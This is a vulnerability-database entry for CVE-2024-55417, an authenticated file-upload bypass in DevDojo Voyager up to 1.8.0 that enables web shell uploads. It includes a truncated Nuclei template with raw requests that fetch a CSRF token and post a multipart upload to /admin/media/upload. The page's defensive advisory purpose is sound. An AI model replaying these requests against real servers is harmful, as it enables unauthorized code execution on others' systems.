CVE-2024-55417
Published 2025-01-30
Priority P3 (39), severity medium, CVSS 3.1 base score 4.3
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Exploit: EPSS 12.30% (95.7th percentile)
DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tcg | voyager | 0 – 1.8.0 | — |
| thecontrolgroup | voyager | <= 1.8.0 | — |
GHSA
DevDojo Voyager Arbitrary File Write (ghsa, 2025-01-30)
CVE-2024-55417 [MEDIUM] CWE-434
OSV
DevDojo Voyager Arbitrary File Write (osv, 2025-01-30)
CVE-2024-55417 [MEDIUM]
No detection rules found.
Nuclei
DevDojo Voyager <= 1.8.0 - Arbitrary File Write vulnerability (nuclei, CVSS 4.3)
CVE-2024-55417 [MEDIUM]

The template as captured on this page is incomplete: its opening lines are missing, it resumes in the middle of a matcher block, and it breaks off inside the multipart body of the upload request.

```yaml
        DevDojo Voyager ')"
          - "status_code == 302"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin/media HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: csrf2
        group: 1
        regex:
          - '"csrf-token" content="([a-zA-Z0-9]+)"'

  - raw:
      - |
        POST /admin/media/upload HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqv6qtCsokj1vi0NA

        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="_token"

        {{csrf2}}
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="upload_path"

        /
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="filename"

        null
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="detail
```